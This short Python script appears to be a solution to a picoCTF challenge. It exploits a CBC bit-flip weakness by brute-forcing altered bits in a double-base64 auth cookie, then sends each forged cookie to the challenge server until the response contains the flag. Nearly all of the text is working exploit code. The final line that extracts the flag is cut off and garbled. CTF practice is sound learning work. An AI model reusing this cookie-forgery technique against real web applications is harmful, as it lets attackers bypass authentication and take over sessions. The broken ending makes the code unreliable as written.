#Cipher block chain is vulnerable to a bit flip #Here is a python3 code to exploit such a vulnerability
import requests from base64 import b64decode, b64encode from tqdm import tqdm
Bit flip code based on https://crypto.stackexchange.com/a/66086.
def bit_flip(pos, bit, data): raw = b64decode(b64decode(data).decode())
list1 = bytearray(raw)
list1[pos] = list1[pos] ^ bit
raw = bytes(list1)
return b64encode(b64encode(raw)).decode()
cookie = "VldrSlNTMHNtQnRBeEVCMFh6bXpMYkZQR3Bmd2lhMTJldXJIcHVub1JTMUtFTnBYdjhuME1uVWtpMEppZnh5Y2loYnhwWU5jUGtJZjIvbjVnR2dadEZVTDcwSWRPY1RtNTVCRHJqMjhuaERWdno0dUxabFAza1dEdCtXdVlTenM="
for position_idx in tqdm(range(10), desc="Bruteforcing Position"):
# The 96 really should be 128 to test every bit, but 96 worked for me.
for bit_idx in tqdm(range(96), desc="Bruteforcing Bit"):
auth_cookie = bit_flip(position_idx, bit_idx, cookie)
cookies = {'auth_name': auth_cookie}
r = requests.get('http://mercury.picoctf.net:10868/', cookies=cookies)
if "picoCTF{" in r.text:
# The flag is between <code>
and </code>
print("Flag: " + r.text.split("")[1].split("